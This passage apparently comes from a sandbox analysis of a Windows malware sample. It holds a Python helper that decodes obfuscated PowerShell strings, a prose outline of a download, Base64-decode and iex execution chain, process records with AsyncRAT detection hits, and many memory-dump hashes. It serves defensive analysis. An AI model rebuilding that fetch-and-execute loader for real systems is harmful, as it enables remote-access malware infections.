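    "$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';"
)


if __name__ == "__main__":
    for name, value in decode_page_strings().items():
        print(f"{name:13} -> {value!r}")
    print(webclient_statement())
    print(decode_command_line(SAMPLE_CMDLINE))
```

Run `looks_intact()` on each literal before trusting its decode: the literals used above all split into whole 6-character chunks, but some literals in the rendered command line on this page (for instance the `$Omskrivelses` string that builds the `cmd /c` line) no longer do, which is what you would expect if consecutive spaces were collapsed by the report's HTML rendering. For those, decode from the raw command line exported from the sandbox rather than from the page text. The remaining literals follow the same scheme and yield the download-and-run chain: fetch `$Fluernes` to `$Applausers[0]`, read the file, `FromBase64String`, take `Substring(338899, 27394)` of the result (both numbers are visible in the command line) and pass it to the dot-sourced `iex`.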

                                                                                              Target ID:7
                                                                                              Start time:15:03:06
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
                                                                                              Imagebase:0x1c0000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:10
                                                                                              Start time:15:03:34
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                              Imagebase:0x1b0000
                                                                                              File size:516'608 bytes
                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2941556648.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 04fce170948be31b33e6e603b52b26c3d58c024d2fcc416358c01dd19038a7cd
                                                                                                • Instruction ID: 13e7c0fc17ff98979a4cebb201856a19fee27f0958106fe7543258ef16f83569
                                                                                                • Opcode Fuzzy Hash: 04fce170948be31b33e6e603b52b26c3d58c024d2fcc416358c01dd19038a7cd
                                                                                                • Instruction Fuzzy Hash: 04223662A0EBCA0FE7969B2848B61A87FE0EF57614B1801FBD15DC71D3DE5CA805D381
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ca9c053420314f38e94fdeeacbc1394899e393d6711ca2111125d4907df6d1ef
                                                                                                • Instruction ID: c1443a74b88d1132da3f150a6a3d660758e7a14391fd3867429f8ad1cba6f8af
                                                                                                • Opcode Fuzzy Hash: ca9c053420314f38e94fdeeacbc1394899e393d6711ca2111125d4907df6d1ef
                                                                                                • Instruction Fuzzy Hash: 2BD18570A18A4E8FEBA8DF28C8957E977D1FB54301F04436ED80DC7295CF78A9858B81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5cf826229eed73c2a3ae6efc1090b42893ded9789a194653dcb19a9c01f3e7ee
                                                                                                • Instruction ID: a82cf7bd568f78408003ed8a3bc1cc536333a78047ce763824643fb01170ee5f
                                                                                                • Opcode Fuzzy Hash: 5cf826229eed73c2a3ae6efc1090b42893ded9789a194653dcb19a9c01f3e7ee
                                                                                                • Instruction Fuzzy Hash: 66D17670A1894D8FEBA8DF28C8A97E977D1FB54311F54432ED80DC7295CE78A9848BC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2941556648.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 54592def536bff4c741274f7c940e6c2810a2154814e6090019427aff62156d4
                                                                                                • Instruction ID: 72ee48a2bf1c7af7061de0c695ae25893d5c8e8cde181b3ebb17489549e1864c
                                                                                                • Opcode Fuzzy Hash: 54592def536bff4c741274f7c940e6c2810a2154814e6090019427aff62156d4
                                                                                                • Instruction Fuzzy Hash: 2CB12562B0EB8A0FEBE59B2858A45B97BE1EF57214B4801BBD14DC71E3DD5CAC05C381
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49f539acf0ce916c3b9534490eb00db3656006ff1a901dd517fe0ead97c5bf8c
                                                                                                • Instruction ID: e1be11cba2bd2c73594ef17833128e3c4a8971fa0d24575c088a8d0b24a33d1b
                                                                                                • Opcode Fuzzy Hash: 49f539acf0ce916c3b9534490eb00db3656006ff1a901dd517fe0ead97c5bf8c
                                                                                                • Instruction Fuzzy Hash: 1A81287071CA498FD798EB1CC4D5AB5B7E1FF99351B1406BDD08AC32A6DA2AF842C740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2941556648.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c81d9a9b4599eb987381d378a5a1814cfa164f209f2a9dc5c451d39d5e95c068
                                                                                                • Instruction ID: 45f958a5e0427e70678ffc4143c84d1336b477cbeeed809f51ecccebcc70a62d
                                                                                                • Opcode Fuzzy Hash: c81d9a9b4599eb987381d378a5a1814cfa164f209f2a9dc5c451d39d5e95c068
                                                                                                • Instruction Fuzzy Hash: EE412662F0EACA0FE7A5D72C44B21B86BE1EF56650B5801BAD11CC72E3DE5DEC44A341
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2941556648.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4f44b90eead5d28c4d082f4905112f96caddb090595129571686060313a0ab87
                                                                                                • Instruction ID: 6eda948df2a132b8227f45afcf1f6eb7df1cea88c49c9465483cf2a136af3aa2
                                                                                                • Opcode Fuzzy Hash: 4f44b90eead5d28c4d082f4905112f96caddb090595129571686060313a0ab87
                                                                                                • Instruction Fuzzy Hash: 4A31F852F1FBDB0FF7E6976818B117C6AD0AF07258B9801BAD11DD72D3ED4CA8049282
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                • Instruction ID: a3aa805882adb9c62ad537c971133e5f2f0b19ad6a47dc11fcc933690c630be0
                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                • Instruction Fuzzy Hash: 5601677121CB0C8FD744EF0CE451AA6B7E0FB95364F10056EE58AC3691D736E882CB45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8dfddbf1bb72bd97bebaaf45e47ba82bc2b77d1e36ff080f06731958659d73b8
                                                                                                • Instruction ID: 7266197e28117f7e3a20d2aa2487e57a7674f3edc48e389f90611503c9245ed5
                                                                                                • Opcode Fuzzy Hash: 8dfddbf1bb72bd97bebaaf45e47ba82bc2b77d1e36ff080f06731958659d73b8
                                                                                                • Instruction Fuzzy Hash: 01E1A596B0E7D29FE312576C68F60E63FA0EF5326434D41B7C284CA0A3E91D245BD395
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 11ed363e2b9984e053d516fba785f088868676f4849063f672225f99af081887
                                                                                                • Instruction ID: e97196790d8d9ec79ab3647280a48b7772530afec7a9c4ab365e58b58d03648f
                                                                                                • Opcode Fuzzy Hash: 11ed363e2b9984e053d516fba785f088868676f4849063f672225f99af081887
                                                                                                • Instruction Fuzzy Hash: F4E1A271A08A498FDF94DF5CC4A5AEA77F1FF69300F184266D049D7256CA39A882CBC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ef3be8b240bb7232a9ac588915aafcef1768043dbe087b62fc098577c456bc4b
• Instruction ID: 7be6c96a8d48c5db2bf7b55d0cd5998e9b5dc977a8cde178765b37f4a7d3bfb4
• Opcode Fuzzy Hash: ef3be8b240bb7232a9ac588915aafcef1768043dbe087b62fc098577c456bc4b
• Instruction Fuzzy Hash: E3417297B0E7C29AE752463C9CB50E67FA0EE5326570D02F7C684CB093DA0D6847A7A1

Memory Dump Source
• Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08166ef661468a2de4657db18f4e1f24447260e0dfe8e2272d2645bfabd1f9d7
• Instruction ID: 4365fbfa2bf4403b8cee62f94bbb44083403a8b5a516c78a1608e91cdb8b801a
• Opcode Fuzzy Hash: 08166ef661468a2de4657db18f4e1f24447260e0dfe8e2272d2645bfabd1f9d7
• Instruction Fuzzy Hash: CEB14B71E002198FEB14CFA9C8857ADFBF2FF88305F148169E815A7264EB74E941CB91

Memory Dump Source
• Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82647e1cfa74e82c02687f5ebf4cccf09209420ef4a3c1124efaae829fec7fd5
• Instruction ID: a2832f3de45a5268ec95b78b51bcb210a092c45cd5052c01dd24df3db5d70456
• Opcode Fuzzy Hash: 82647e1cfa74e82c02687f5ebf4cccf09209420ef4a3c1124efaae829fec7fd5
• Instruction Fuzzy Hash: BCB15171E002098FEF10CFA9D8957ADFBF2EF88714F148569E815E7264EB74A845CB81

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1926ea9df924696d40d8dfc8ae8b4d3d9be6dfc7dbaada54d9d88cb648041d51
• Instruction ID: 74a7b0f530015c4ab7c6ee57594c4f0b9b5794984122b3b1d7475cfb58b8ced8
• Opcode Fuzzy Hash: 1926ea9df924696d40d8dfc8ae8b4d3d9be6dfc7dbaada54d9d88cb648041d51
• Instruction Fuzzy Hash: 3E827AB0E00205CFDB14CBA8C544A6ABBB2AFC9704F14C469D9159F795DB72EC86CF91

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b85a78e59f8b09ec2f2070a622f9c4894394b5978d8a6559aa045c86f146808
• Instruction ID: f834f0ca2bef064f51841e28bf752b8ef305114fa36465cc7469b4ce52954dea
• Opcode Fuzzy Hash: 2b85a78e59f8b09ec2f2070a622f9c4894394b5978d8a6559aa045c86f146808
• Instruction Fuzzy Hash: E8626EB4A00219DFDB14DB68C950BDDBBB2AF89304F1085D9D609AB385CB75EE81CF91

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e477de6bdb3b1676536153c8df53512575209e798bf01c3297de045b757403ce
• Instruction ID: 4dc7ba539c4e7f3f251b8fb0d31a9627106c633cf3c0d6bd0010f0b7ab8601a3
• Opcode Fuzzy Hash: e477de6bdb3b1676536153c8df53512575209e798bf01c3297de045b757403ce
• Instruction Fuzzy Hash: 50428FB4E00215DFDB24CF58D844B9ABBB2AFC9304F1085A9D519AB391CB71EC81CF92

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 181c67248628a29cc2e9f35b8376f15e53dca90062ab5af2c69eada459021af7
• Instruction ID: 96c6ea92332ef7c30be93adb4e64a2250f0157f4e7e3e34982c98f6e8479d53e
• Opcode Fuzzy Hash: 181c67248628a29cc2e9f35b8376f15e53dca90062ab5af2c69eada459021af7
• Instruction Fuzzy Hash: 4F122471604346DFDB258B68D858766BBB5BFC6310F2888AAD514CB2D6CB31C846C7E2

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cdb7879f3a07188cecb4462e27b347c77be0d64a3005e66bf10e31b13164827b
• Instruction ID: caa78930a3915b607dfb21af74d78806c24a296b6d99567bda31df5d0d1d0d46
• Opcode Fuzzy Hash: cdb7879f3a07188cecb4462e27b347c77be0d64a3005e66bf10e31b13164827b
• Instruction Fuzzy Hash: B43237B4E00205DFDB14CB98C544EA9BBB2AF89704F24C469E9199F395C772EC86CF91

Memory Dump Source
• Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 51b1755c61d380ef50f1b55ef3aaf5e5e6c21859ee5dacea096e0e1b76788e62
• Instruction ID: 3f41bced03d9dc1f21a6462d6d731624b253197a86a02a23cd7493696702ceaa
• Opcode Fuzzy Hash: 51b1755c61d380ef50f1b55ef3aaf5e5e6c21859ee5dacea096e0e1b76788e62
• Instruction Fuzzy Hash: 9E223E34B002188FDB25DB24D854BADB7B2BF89305F1584E9D90AAB361DF35AD85CF90

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bda41e388dcdbd283dc2112830fe2f463cec80354817dd20d036713a1582b19
• Instruction ID: ae794477ad7f4c3ecf0bdb6e4adec9330b2d9f19af973ccc50a8ef3742d3498d
• Opcode Fuzzy Hash: 6bda41e388dcdbd283dc2112830fe2f463cec80354817dd20d036713a1582b19
• Instruction Fuzzy Hash: D01207B1B04205CFDB14EB68D444AAABBF2AFC9710F14886AD515DB395CB32DC41DBE2

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ad0858b5f7f437257839b7c97766e0373b0ae1c0419bf69437bd5adc307e05d6
• Instruction ID: a2a06b3005c72647d457b2f1cb25af4acc9b818bd8d7c89796f34fb877ecbf03
• Opcode Fuzzy Hash: ad0858b5f7f437257839b7c97766e0373b0ae1c0419bf69437bd5adc307e05d6
• Instruction Fuzzy Hash: 891247B4E00205DFDB14CB88C544EAABBB2AF85704F24C869E9159F395D772EC86CF91

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f30b3578b166ebc239b92d0e4dfc6f68cbae35d6dc8f19f1b82e281c4153f65
• Instruction ID: 9f834ab4c488c8c570c218419e7b84a84dcd14a9c2d99a173fd88a6b633c65d7
• Opcode Fuzzy Hash: 8f30b3578b166ebc239b92d0e4dfc6f68cbae35d6dc8f19f1b82e281c4153f65
• Instruction Fuzzy Hash: 5C02F2B0B00245DFD714CBA8D450BAEBBA2BFCA300F148869E611AB795CB71DC41CBE1

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 390522d35925b3b35f2234b255c451f076faac3ac3c2438c938c81d3e917b07b
• Instruction ID: e0e9f0c679b3e43164c518d56a05fb5facded80f9a27243d466e0dc3ee95101d
• Opcode Fuzzy Hash: 390522d35925b3b35f2234b255c451f076faac3ac3c2438c938c81d3e917b07b
• Instruction Fuzzy Hash: 2E022CB4A00219DFDB24DB64C850BDDBBB2AF89304F1085E5DA09AB791CB75DE81CF91

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bc2d975b6c4d107e4cea050e7ec023081d83b2813b6aec73444ee49e7f801612
• Instruction ID: b7bc03c475e37d7d8d82b1e47c84290ba29ccf97cc03235893204d14a5cbba94
• Opcode Fuzzy Hash: bc2d975b6c4d107e4cea050e7ec023081d83b2813b6aec73444ee49e7f801612
• Instruction Fuzzy Hash: 0DF151B4A00215DFD724DB58C850BAABBB3AFC4704F10C499E609AF795CB71ED858B92

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13e56b53a16d1ba3c8b129850ced0c8c4e6c4e01ff52f51a89cbafaf63f3a0e9
• Instruction ID: 2bc6ee9dc1059c69fd09ffdf35402e8acaa9d7fdc9647523fe83e989c6397fdd
• Opcode Fuzzy Hash: 13e56b53a16d1ba3c8b129850ced0c8c4e6c4e01ff52f51a89cbafaf63f3a0e9
• Instruction Fuzzy Hash: FAE18EB0A00214DFD714DB68C954B9EBBB2AFC8704F1084D9E609AF391CB75ED818FA5

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 03e0166ae1f6bcfec50d208cd79057d5693b3c8bec790f360cebd192d921bddb
• Instruction ID: c8d722a14d062b8ab6f9ed9793171c73a791115308626477e5104d6ad39ca72a
• Opcode Fuzzy Hash: 03e0166ae1f6bcfec50d208cd79057d5693b3c8bec790f360cebd192d921bddb
• Instruction Fuzzy Hash: E3D180B0A00205DFDB14CBA8D454B9EBBB2BFC8704F10C459E6156F795CB76E8458BE2

Memory Dump Source
• Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bddbf01120e9f0fa4899854a2a9555ac931049db01ff52dd0a66228b70db0ca5
• Instruction ID: 30eeeefa4622aa4419a74a276df232368b15f44b62f29333e3268ad5964464f2
• Opcode Fuzzy Hash: bddbf01120e9f0fa4899854a2a9555ac931049db01ff52dd0a66228b70db0ca5
• Instruction Fuzzy Hash: 35B138B5B04206CFEB108B69E44477BBBB6EFC5351F14886AD524CB292DB75C841CBE2

Memory Dump Source
• Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c3cffc675245eea524fa9d59250953d6de32c5f582eedb4228fa508dc5a3878
• Instruction ID: 19c7b0f03b6bc5bc75089c5cce495da93788a2ba362d9bd04500fd8495c4f30a
• Opcode Fuzzy Hash: 4c3cffc675245eea524fa9d59250953d6de32c5f582eedb4228fa508dc5a3878
• Instruction Fuzzy Hash: A7D1F474A012499FDB05CFA8D494A9DFBF2FF89350F248199E805AB361C775ED82CB90

Memory Dump Source
• Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a0a2bdb6f835fa4246493e18eaefa7249588fbea89539a2d229e00a6643167f7
• Instruction ID: f29a2dd6ea6b6658b57deefc78789200d242abc961dec088c1e0674440a1fe76
• Opcode Fuzzy Hash: a0a2bdb6f835fa4246493e18eaefa7249588fbea89539a2d229e00a6643167f7
• Instruction Fuzzy Hash: D8B14870E002198FEB10DFA8C88579DFBF2FF88705F148169E815AB264EB74E941CB91

Memory Dump Source
• Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dede4e8002b42c59cec5f5e9ea66dd61b53a9f7da988a6749a2c4b9688b144cb
• Instruction ID: 360aff0d33f9d0a7785617cb2396feef6d6f5f4d588cebc06354c18d13cf8a81
• Opcode Fuzzy Hash: dede4e8002b42c59cec5f5e9ea66dd61b53a9f7da988a6749a2c4b9688b144cb
• Instruction Fuzzy Hash: 16A18F75A00258DFDB14EFA4D944A9DFBB2FF89304F118598E806AF364DB74AD49CB80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84665a64258c3a6fee5b279093e4f7384ee0fddf9f63e64ecaa0ad79c6a3b58f
                                                                                                • Instruction ID: 2dbf49eee286316db82596f0e897bdd6a2a5e508953afb8f51f747bf00a6a3be
                                                                                                • Opcode Fuzzy Hash: 84665a64258c3a6fee5b279093e4f7384ee0fddf9f63e64ecaa0ad79c6a3b58f
                                                                                                • Instruction Fuzzy Hash: 7EB14D70E00249CFEF10CFA9D8857ADFBF1EF88714F148569E815AB264EB74A845CB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 112c95494425de366474edaabd563ff325f1cd912850fa16ab287683522ac550
                                                                                                • Instruction ID: fa7887bd6686d203d0dd30d7e56678663d4ac3adf3c79db761746bf4554bc848
                                                                                                • Opcode Fuzzy Hash: 112c95494425de366474edaabd563ff325f1cd912850fa16ab287683522ac550
                                                                                                • Instruction Fuzzy Hash: 25B18CB0A00205DFDB14CFA8D440B9ABBB2BFC8704F10C559E6156F395CB72E8858BE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a2c3d2ee5d8964e2f6ca87da06a3fe43b1b4687787aa716692e898eed4cc1109
                                                                                                • Instruction ID: 259dc79ffd1ece005502337bab2129e3e4612109682cacc6115f6ad15f440162
                                                                                                • Opcode Fuzzy Hash: a2c3d2ee5d8964e2f6ca87da06a3fe43b1b4687787aa716692e898eed4cc1109
                                                                                                • Instruction Fuzzy Hash: 3A8116B56043469FD7158B78A850767BFB5EFC6350F24886BE464CB292CB35C881C7E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf13e3136846d864e4dc556291cd14dbdfa94bb5590eda5390e4366a62a0e7fe
